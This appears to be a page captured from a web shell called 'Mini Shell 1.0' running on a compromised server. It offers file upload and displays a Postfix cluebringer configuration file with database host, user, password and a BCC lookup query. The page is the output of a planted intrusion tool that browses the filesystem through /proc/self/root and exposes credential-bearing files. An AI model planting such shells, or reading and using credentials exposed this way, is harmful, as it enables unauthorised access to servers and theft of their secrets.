HOME


Mini Shell 1.0
DIR:/proc/self/root/usr/share/doc/cluebringer-v2.1.x/contrib/postfix/
Upload File :
Current File : //proc/self/root/usr/share/doc/cluebringer-v2.1.x/contrib/postfix/bcc.cf
hosts=localhost
user=postfix
password=test
dbname=postfix

query=	SELECT BCC
		FROM mailboxes
	WHERE 
		Mailbox = '%s'
		AND BCC IS NOT NULL
		AND Disabled = 0